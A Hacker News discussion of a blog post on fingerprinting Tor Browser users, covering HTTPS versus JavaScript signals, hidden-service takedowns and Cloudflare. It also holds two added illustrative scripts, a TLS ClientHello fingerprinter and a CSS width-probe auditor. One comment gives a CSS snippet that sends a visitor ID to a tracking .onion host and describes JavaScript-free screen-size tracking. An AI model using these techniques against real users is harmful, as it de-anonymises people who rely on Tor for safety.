
Exploiting the TOR-Browser - dsr_
http://www.hackerfactor.com/blog/index.php?/archives/761-Exploiting-the-TOR-Browser.html
======
apeace
> The things that makes TOR useful for people avoiding prosecution also makes
> it useful for people involved in malicious and criminal activities ...
> Everything from spam and network attacks to trafficking people and
> contraband.

> Although the Tor Project could promote options to restrict these malicious
> actions, they choose to do nothing. Seriously: if a TOR hidden service
> offers hard-core drugs or human trafficking or fake IDs, then they should be
> shut down.

I hope I can convince some folks here to be skeptical of this kind of
thinking.

Think about it: If the Tor project came up with some clever way to take down
bad hidden services, then what would be stopping a government from forcing
them to take down legitimate hidden services too? And meanwhile, the criminals
would move on to some other Tor-like service, and keep doing their thing.

In short, you're not going to stop criminals, who will always find a way to
keep doing what they're doing. You will, on the other hand, impede the free
speech of honest users.

The Tor project should focus on making it impossible for hidden services to be
taken down--even by the Tor project itself! And they do :)

~~~
mhuffman
> The things that makes TOR useful for people avoiding prosecution also makes
> it useful for people involved in malicious and criminal activities ...
> Everything from spam and network attacks to trafficking people and
> contraband.

It is ok if someone that doesn't understand it says those sorts of things, but
when an organization like cloudflare[1] jumps on the goof-troop bandwagon, it
really does make a difference.

[1] [https://blog.torproject.org/blog/trouble-cloudflare](https://blog.torproject.org/blog/trouble-cloudflare)

~~~
apeace
I hope I can make you more skeptical of the "Cloudflare is the bad guy" trope.
Cloudflare is lightyears ahead of any CDN when it comes to supporting Tor.

They specifically built controls so that web sites can remove CAPTCHAs for Tor
users completely.[0]

They also do not block/CAPTCHA Tor users automatically. They treat Tor IPs
like any IPs: if they detect abuse from the IP, they start giving the CAPTCHA.

Finally, Cloudflare has stated publicly[1] that they have a desire to setup
.onion sites for their customers automatically. But they cannot do so until
the Tor project is able to upgrade the hashing algorithm used for .onion
addresses. If the two organizations could work together, this could be game-
changing for online anonymity. Imagine millions of web sites automatically
supporting Tor!

I can't understand why the HN crowd is so anti-Cloudflare. This Tor thing
seems to be one of the major misconceptions.

Disclaimer: I'm not affiliated with either Tor or Cloudflare in any way.

[0] [https://support.cloudflare.com/hc/en-us/articles/203306930-D...](https://support.cloudflare.com/hc/en-us/articles/203306930-Does-CloudFlare-block-Tor-)

[1] [https://blog.cloudflare.com/the-trouble-with-tor/](https://blog.cloudflare.com/the-trouble-with-tor/)

~~~
mhuffman
My link was a direct response to your second link.

I do not believe cloudflare on your first link (that they treat tor ips like
any ips).

I can tell you from experience that I have never connected to a cloudflare
backed site with tor that didn't require multiple captchas. So every tor ip is
hostile to cloudflare sites? If so, how is that practically different than
just blocking tor?

I think that if you read the response at your first link again, you can see
that they are implying what you are saying, but they are not saying what you
are saying. I think they are blocking tor, but explaining it in a diplomatic
way.

~~~
Trundle
>So every tor ip is hostile to cloudflare sites?

OP blog post claims 96% of the traffic going to their tor hidden service is
hostile. It doesn't seem unreasonable to me at all that every tor ip is
hostile.

~~~
mhuffman
It is their definition of "hostile" that is the problem. They do not explain.
I suspect it means "I can't track you, so you are hostile." Otherwise, where
is the data for this?

------
CiPHPerCoder
> In my experience, HTTPS makes you more distinct and trackable than plain
> HTTP.

You lost me here.

[https://www.wired.com/2017/01/half-web-now-encrypted-makes-e...](https://www.wired.com/2017/01/half-web-now-encrypted-makes-everyone-safer/)

~~~
apeace
The author is correct. HTTPS adds more vectors which can be used to form a
fingerprint, such as the TLS version or the preferred cipher suites of the
browser.

For example: [https://www.ssllabs.com/projects/client-fingerprinting/](https://www.ssllabs.com/projects/client-fingerprinting/)

Anecdotally, I can tell you I have heard of ad tracking companies actively
using this (for years now).

~~~
acdha
That's what you use when you don't have the richer information offered by HTTP
sniffing.

TLS versions tell you someone is one of a billion users of iOS version X; with
HTTP they can piece together session cookies across every site and service you
use, or with active attacks use things like the Verizon injected tracking code
uniquely identifying you across devices.

~~~
apeace
That's true. If you're talking about your ISP sniffing your traffic, HTTPS is
a win. But since the author was talking about using Tor, I figured he was
focusing on fingerprinting by the websites themselves, where HTTPS is easier
for them to fingerprint than HTTP.

~~~
acdha
> fingerprinting by the websites themselves, where HTTPS is easier for them to
> fingerprint than HTTP.

Could you explain your reasoning on that? If they're using the Tor browser
every user is going to be very similar on crypto suites, user-agent, etc. —
it's a rebadged Firefox distributable so it's going to be using their HTTPS
implementation and you won't even get the OS version variations unless someone
at the Tor project massively screws up.

The bigger problem is that if you are being targeted by the website, there are
far more interesting attacks they can try – convince the user to turn on
JavaScript and do all of that profiling for WebGL/canvas rendering, local
fonts, network resource timing to look for cached content from other sites,
etc.

~~~
apeace
Yes, great point. But I said _easier_, not _easy_. Using HTTPS, a user may
have a more outdated version of the Tor browser with different cipher suites
than everyone else. Using plain HTTP, that can't happen.

> unless someone at the Tor project massively screws up

And that is what the author of the article is claiming.

My comments here aren't in agreement with the author of the article, and I'm
not claiming "HTTPS is bad" or anything like that. It's simply a categorical
fact that HTTPS has more vectors to be fingerprinted than HTTP.

But of course, as you mentioned, features enabled by Javascript are the bigger
problem, which is why users who wish to be anonymous should completely disable
it!
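
The TLS-level signal argued over in this exchange, as an added example that is not part of the thread or the article: a Python parser that pulls the version, cipher suite order and extension types a server sees in the clear in a ClientHello and hashes them into one value. The ClientHello bytes are built locally from constructed suite lists (real IANA code points, but not Tor Browser's actual configuration); two clients with the same configuration collapse to one value, while a client offering a different suite list stands out.

```python
import hashlib
import struct


def build_client_hello(version, suites, ext_types):
    """Build a minimal TLS ClientHello record from constructed values (sample data, not a capture)."""
    body = struct.pack(">H", version) + bytes(32) + b"\x00"        # version, 32-byte random, empty session id
    body += struct.pack(">H", 2 * len(suites))
    body += b"".join(struct.pack(">H", s) for s in suites)         # cipher suites in preference order
    body += b"\x01\x00"                                            # one compression method: null
    exts = b"".join(struct.pack(">HH", t, 0) for t in ext_types)  # extension headers with empty bodies
    body += struct.pack(">H", len(exts)) + exts
    hs = b"\x01" + len(body).to_bytes(3, "big") + body             # handshake type 1 = client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs       # record type 22 = handshake


def parse_client_hello(data):
    """Extract the fields any server (or on-path observer) sees unencrypted."""
    if data[0] != 0x16 or data[5] != 0x01:
        raise ValueError("not a handshake record carrying a ClientHello")
    p = 9                                   # record header (5 bytes) + handshake header (4 bytes)
    version = struct.unpack(">H", data[p:p + 2])[0]
    p += 2 + 32                             # skip version and random
    p += 1 + data[p]                        # skip session id
    n = struct.unpack(">H", data[p:p + 2])[0]
    p += 2
    suites = [struct.unpack(">H", data[i:i + 2])[0] for i in range(p, p + n, 2)]
    p += n
    p += 1 + data[p]                        # skip compression methods
    ext_len = struct.unpack(">H", data[p:p + 2])[0]
    p += 2
    ext_types, end = [], p + ext_len
    while p < end:
        ext_type, ext_body_len = struct.unpack(">HH", data[p:p + 4])
        ext_types.append(ext_type)
        p += 4 + ext_body_len
    return {"version": version, "suites": suites, "extensions": ext_types}


def fingerprint(data):
    """Hash version + suite order + extension order, the way server-side client fingerprinting does."""
    h = parse_client_hello(data)
    text = "{},{},{}".format(h["version"],
                             "-".join(map(str, h["suites"])),
                             "-".join(map(str, h["extensions"])))
    return hashlib.sha256(text.encode()).hexdigest()[:16]


# Constructed configurations (real IANA code points, not any browser's actual list):
# a "current" client offering TLS 1.3 suites first, and an "outdated" one that lacks them.
CURRENT_SUITES = [0x1301, 0x1302, 0xC02B, 0xC02F]
OUTDATED_SUITES = [0xC02B, 0xC02F, 0x002F]
EXTS = [0, 10, 13, 16]                     # server_name, supported_groups, signature_algorithms, ALPN

HELLO_USER_A = build_client_hello(0x0303, CURRENT_SUITES, EXTS)
HELLO_USER_B = build_client_hello(0x0303, CURRENT_SUITES, EXTS)
HELLO_OUTDATED = build_client_hello(0x0303, OUTDATED_SUITES, EXTS[:3])

if __name__ == "__main__":
    print("A == B:", fingerprint(HELLO_USER_A) == fingerprint(HELLO_USER_B))          # same config, same value
    print("A == outdated:", fingerprint(HELLO_USER_A) == fingerprint(HELLO_OUTDATED))  # outdated client stands out
```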

~~~
acdha
Adding HTTPS plausibly adds a single low-cardinality signal but it removes a
ton of other ones for network-level observers. When it comes to hostile site
owners, realistically you're screwed but from a privacy perspective it's a
question of whether you're one of the small percentage of users who have a)
failed to install updates and b) disabled JavaScript.

That's a pretty small percentage of users for whom HTTPS isn't an across-the-
board win for privacy.

------
wyager
> Seriously: if a TOR hidden service offers hard-core drugs or human
> trafficking or fake IDs, then they should be shut down.

If it were possible to do this, TOR would lose any shred of value it has for
people using it to fight oppression.

Ok, let's say we put technology in place to "shut down" sites that sell fake
IDs to teenagers (god forbid!).

Well now, Mr. Lawman from the U.K. or China is going to come in and say "hey,
wait a minute, you can shut down websites that illegally peddle fake IDs, so
you obviously have the ability to shut down websites that peddle illegal
extremism (meaning falun gong, anti-government groups, etc.)." The _only_
defense against the TOR project and its supporters being forced to do this is
that it's not technically feasible.

It's _really bad_ that this isn't manifestly obvious to someone who is
apparently involved with the TOR project to a substantial degree.

~~~
mschuster91
> If it were possible to do this, TOR would lose any shred of value it has for
> people using it to fight oppression.

Most people in that field mess up their opsec sufficiently often that this is
very well possible, see SilkRoad and its successors.

When it comes to the kiddyfuckers, I'm a bit torn myself when I ask myself if
child pornography (and apparently people even shared videos of raped
_toddlers_ ) is an excuse for hacking and exposing actually innocent TOR
users. It's the classic 4chan/reddit dilemma: what kind of content justifies
which measures, and when is it worth limiting the right to free speech?

For the record, I support anything done to bring child porn offenders to
justice, but I also recognize that this opens dangerous doors - from the issue
of "now it's an excuse for the Chinese/Russians/Iran/Saudi-Arabians to crack
down on legitimate activities" to "people are actually already planting fake
child-porn evidence, including in scareware/ransomware".

~~~
Izmaki
The thing is, a person wearing a mask is only hidden in a crowd, if the crowd
of people wearing masks exist in the first place.

By removing all evil from tor, you expose the good, leaving it vulnerable.
That defeats the purpose, I suppose.

~~~
mschuster91
Yeah, certainly removing child porn from TOR reduces the amount of background
noise in traffic. But there should still be vast quantities of people using
TOR for file-sharing to provide significant noise...

~~~
Izmaki
Why target one illegal activity and not the other? It would serve no purpose
to allow some crimes to take place, but not others. I believe that organizing
drug sales, small amounts as well as large, is just as horrible and can ruin
just as many lives as distributing images and videos (I wonder how many are
duplicates) of exploited children.

~~~
mschuster91
Because it's usually the drug consumer him/herself who decides what to buy and
consume - and given that most of the drug sellers apparently don't cut their
products with weird stuff from rat dung to lead, fentanyl or other stuff that
sometimes causes dozens of ODs (fentanyl-contaminated heroin batches are well
known for this, and a plague for ERs because the victims always come in a
bunch) one might argue that clean, vetted drugs via TOR/Silk Road are better
for society than if the users would hit the streets. Also, drugs bought on the
streets directly finance the street mafia and contribute to gang violence, as
well as negative reputation for the "dealer city quarters". Internet drug
shopping kills off this part of the chain totally.

Child porn is just ... inexcusable no matter how you think about it. Fine, if
some porn stars make themselves look young, okay, but that's consenting adult
performers. Abusing toddlers and children for porn is not just violent in
itself, it literally creates wrecks.

~~~
Izmaki
You cannot defend one type of crime, because another type is much worse. If
possible, one could argue that child pornography is less horrible than hitman
services and human trafficking, given that the majority of the content shared
is not new content of new victims.

Let's not try to justify serious crime, because other crime may be seen as
more serious.

~~~
mschuster91
The point is that child pornography (and also sexual abuse of children) is
viewed as evil across all societies and groups.

Human trafficking, drugs and hitmen services, however, are not - the most
notable exception being the various kinds of mafia or other organized crime.

------
irl_
Browser fingerprinting is not new.

See also: [https://panopticlick.eff.org/](https://panopticlick.eff.org/)

"Panopticlick will analyze how well your browser and add-ons protect you
against online tracking techniques. We’ll also see if your system is uniquely
configured—and thus identifiable—even if you are using privacy-protective
software."

Tor bug #6119
([https://trac.torproject.org/projects/tor/ticket/6119](https://trac.torproject.org/projects/tor/ticket/6119))
talks about using this tool specifically for Tor Browser. There are also
continuous efforts in Tor Browser to remove fingerprintability (e.g. #22127 -
[https://trac.torproject.org/projects/tor/ticket/22127](https://trac.torproject.org/projects/tor/ticket/22127)).

------
mirimir
The title is clickbait. There are no exploits involved. He's not dropping NITs
on users, for example. Fingerprinting is not a huge issue. The main defense is
preventing adversaries from learning one's ISP-assigned IP address. Maybe Tor
Project does encourage too much confidence in the "all users look alike"
feature. They certainly do, in my opinion, regarding the security of Tor
browser in Windows, with no protection against exploits and Tor bypass.

------
FiloSottile
This is little more than an opinion piece. AFAICT, the only "vulnerability" is
that with JS on, it can detect the Operating System.

At some point it claims it can also detect screen size

> However, there are not too many people using the same OS and same screen
> size and visiting the same sites at around the same time. You will likely
> stand out.

but both my tests and themselves contradict that:

> On a normal desktop browser, the Window Size is smaller than the Screen
> Size. (Mobile devices may show a Windows Size that is larger than the Screen
> Size.) To prevent screen profiling, the TOR-Browser sets them to be the same
> size.

Note that _detecting_ Tor Browser is doable from the User-Agent, so there's no
point in setting Window Size = Screen Size.

Definitely not "exploiting", and I suspect that's why it couldn't get a reply
from security MLs, which see a lot of these. Flagged.

------
throwaway322242
A number of people may consider drug markets as fighting oppression. [1] Ross
Ulbricht certainly did. Law and morality evolve.

[1] Psychedelics and cognitive liberty: Reimagining drug policy through the
prism of human rights

------
sanbor
Let's say X event happens and Tor shuts down. What will happen with all those
horrible people using the Tor network? Will they stop doing horrible
activities? Probably not. Maybe they'll have more difficulties in their
activities since they'll be geographically isolated.

Tor is just a channel that horrible people use, but the horrible stuff that
they do happens in real life.

There is one approach that is for sure going to solve the horrible
activities that people do. Put a camera in every house. Put a camera in every
corner. Then you can monitor every person and check if they're doing horrible
things.

Would it be worth living in a world like that?

~~~
angry-hacker
Do you also think the same about gun control? Hate speech?

------
SadWebDeveloper
A little condescending and obnoxious for my taste, but mostly everything here
is well-known, and while the TOR-Browser devs could implement everything this
guy wants, it will end in a moral dilemma of what could be considered
"malicious". IMHO the Tor Browser is not suitable for the truly paranoid, but
usually this won't matter because the truly paranoid are not using the TOR
network as-is (with the integrated browser) and those who aren't truly
paranoid can live with those risks.

~~~
symlinkk
what are the truly paranoid using?

~~~
__s
[https://stallman.org/stallman-computing.html](https://stallman.org/stallman-computing.html)

~~~
linkregister
So IceCat over Tor. Actually pretty sensible.

------
nom
All in all not a really in-depth article, but the author has some valid
points. All parameters exposed by the browser should be varied, especially
the scroll bar size which seems to be the real offender here.

Not sure how the Tails [0] distribution handles it, but IIRC it notified me of
the screen size / view port size problem as I maximize the browser.

0: [https://tails.boum.org/](https://tails.boum.org/)

~~~
SadWebDeveloper
Just disable JS by default and it will be good for 99.99% of the cases where
you don't explicitly allow it.

~~~
mschuster91
You can still target the screen size using CSS - you can even track
_changes_ by creating a css file with literally thousands upon thousands of
media queries, where each media query sets e.g. the background-image property
of a hidden div.

Thanks to gzip compression, this shouldn't even take much data to transfer.

Oh, and as I think of it, would this here still work?

    <a id="mylink" href="http://reddit.com"><span class="tracker"></span></a>
    a#mylink span.tracker { background-image: url(http://myservice.onion/track.php?uid=xxx&trackedsite=reddit.com); }
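
As an added example (not mschuster91's code or anything from the article), a Python audit that scans a stylesheet for the JS-free viewport probing described in this comment: @media rules that pin one exact width and trigger a remote fetch. The stylesheet, the host tracker.example.invalid and the threshold of three probe rules to a single host are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed stylesheet: one ordinary responsive rule, then three "probe" rules of the
# kind described above, each pinning a single viewport width to a remote fetch.
SAMPLE_CSS = """
@media (max-width: 600px) { nav { display: none; } }
@media (min-width: 1000px) and (max-width: 1000px) {
  div.t { background-image: url(http://tracker.example.invalid/track.php?uid=abc&w=1000); }
}
@media (min-width: 1001px) and (max-width: 1001px) {
  div.t { background-image: url(http://tracker.example.invalid/track.php?uid=abc&w=1001); }
}
@media (min-width: 1002px) and (max-width: 1002px) {
  div.t { background-image: url("http://tracker.example.invalid/track.php?uid=abc&w=1002"); }
}
body { background: url(/static/bg.png); }
"""

URL_RE = re.compile(r"""url\(\s*['"]?([^'")]+)['"]?\s*\)""")
PROBE_THRESHOLD = 3   # assumption: this many exact-width probes to one host is reported as fingerprinting


def iter_media_blocks(css):
    """Yield (condition, body) for each @media rule, walking brace depth so nested rules stay intact."""
    pos = 0
    while (start := css.find("@media", pos)) >= 0:
        open_brace = css.find("{", start)
        if open_brace < 0:
            return
        depth, i = 1, open_brace + 1
        while i < len(css) and depth:
            depth += {"{": 1, "}": -1}.get(css[i], 0)
            i += 1
        yield css[start + 6:open_brace].strip(), css[open_brace + 1:i - 1]
        pos = i


def probe_width(condition):
    """Return N when the condition is (min-width: Npx) and (max-width: Npx), i.e. one exact width."""
    lo = re.search(r"min-width:\s*(\d+)px", condition)
    hi = re.search(r"max-width:\s*(\d+)px", condition)
    return int(lo.group(1)) if lo and hi and lo.group(1) == hi.group(1) else None


def audit(css):
    """Report @media rules that both pin an exact width and load something from a remote host."""
    probes = []
    for condition, body in iter_media_blocks(css):
        width = probe_width(condition)
        remote = [u for u in URL_RE.findall(body) if urlsplit(u).netloc]
        if width is not None and remote:
            probes.append((width, remote))
    hosts = sorted({urlsplit(u).netloc for _, urls in probes for u in urls})
    return {
        "probe_rules": len(probes),
        "widths": sorted(w for w, _ in probes),
        "hosts": hosts,
        "suspicious": len(probes) >= PROBE_THRESHOLD and len(hosts) == 1,
    }


if __name__ == "__main__":
    print(audit(SAMPLE_CSS))
```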

~~~
SadWebDeveloper
Of course, but that will also require accommodating the fact that after N
queries the circuit/endpoints change, and unless you have a unique tracking
system for every "attacked" user (like a randomly generated ID per CSS served)
or a way to store it persistently across sessions, Screen Size alone won't be
able to identify everyone on the TOR network. And that's my point: if you
disable JS (raise the security level to the max in the case of the Tor
Browser) you will be good against the most common attacks; for "APTs" you
pretty much don't stand a chance unless you go "outside the grid", aka don't
use the integrated browser.

~~~
mschuster91
You have _lots_ of signals to generate without JS. System font base (this
alone should provide a fairly unique identifier!), screen aspect ratio, DPI
value, "pointer" media query, the relationship between width/device-width...
and on non-TOR-scenarios you can fingerprint supported HTTPS encryption layers
plus the user-agent. Oh, and you can also passively fingerprint on the
presence of an ad blocker.

~~~
SadWebDeveloper
If you can identify _a single person_ on the TOR network with the TOR Browser,
across several sessions, just with the data you are describing and without
false positives, it will probably make a case, but those attacks are well-known
since 2k8 and so far no one has made the same claims you firmly believe, so
unless you know something that no one in the world does, then for the common
"TOR user", those who use the integrated TOR Browser are in good standing just
by disabling JS alone. If you are THAT paranoid, you should already know that
you shouldn't use the integrated browser itself, since you are losing half the
battle just there by giving your adversaries a well-known attack vector.

------
janwillemb
> Since this exploit is one of the minor ones, I've decided to not try to sell
> it.

He would try and sell larger vulnerabilities? It only proves the point, but I
still consider this a little bit disturbing.

------
tptacek
Don't use Tor Browser. It's probably the least safe browser on the Internet.

[https://news.ycombinator.com/item?id=13623735](https://news.ycombinator.com/item?id=13623735)

(For people unfamiliar: Tor and Tor Browser are not the same thing!)

~~~
pdexter
What to use instead?

~~~
tptacek
Literally any other mainstream browser.

~~~
middleclick
Hardly good advice. Tor Browser is specifically built with privacy and
security in mind. Using any "mainstream browser" and then expecting to do all
those tweaks is not practical advice nor feasible.

~~~
tptacek
Read the link upthread. I didn't explain the argument here because it's
explained in depth there. Never, ever use Tor Browser.

------
travbrack
So, make a browser extension that gives you a different fingerprint every time
you use it.

------
smoyer
I have a habit of browsing with random window sizes (usually shrunk to just
fit what I want to see). I guess if I ever need to use the TOR browser, I'll
need to get out of that habit! This researcher disclosed his simplest approach
to fingerprinting TOR browsers but if he really has 12 factors, you'll only be
safe browsing sites with huge amounts of traffic.

------
eeZah7Ux
Complaints do not help. Contributions and donations do.

Tor is spelled Tor, not TOR.

~~~
linkregister
TOR is the legacy name, an acronym for The Onion Router. The modern spelling
is preferred, but it isn't incorrect to call the project TOR.

[https://en.wikipedia.org/wiki/Tor_(anonymity_network)](https://en.wikipedia.org/wiki/Tor_\(anonymity_network\))

~~~
mirimir
Well, Paul Syverson says that it's Tor, not TOR, and has never been an
acronym.

[https://www.acsac.org/2011/program/keynotes/syverson.pdf](https://www.acsac.org/2011/program/keynotes/syverson.pdf)

~~~
Dylan16807
> He would respond that it was _the_ onion routing, the original program of
> projects from NRL. It was Rachel Greenstadt who noted to him that this was a
> nice acronym and gave Tor its name. Roger then observed that it also works
> well as a recursive acronym, ‘Tor’s onion routing’. It was also his decision
> that it should be written ‘Tor’ not ‘TOR’. Making it more of an ordinary
> word in this way also emphasizes the overlap of meaning with the German word
> ‘Tor’, which is gate (as in a city gate). To sum up, “Tor: The Second-
> Generation Onion Router” is about the design of onion-routing systems, not
> just onion routers themselves. Tor is the third generation of onion
> routing, not the second. And the ‘r’ in ‘Tor’ represents ‘routing’ not
> ‘router’.
> In hindsight we probably should have spent a bit more time on the paper
> title.

You have a significantly different definition of "not an acronym" than I do.

~~~
mirimir
Sorry, I misspoke. It's not an acronym for "the onion router", but rather for
"the onion routing".

------
theprop
You may prefer the Epic Privacy Browser.

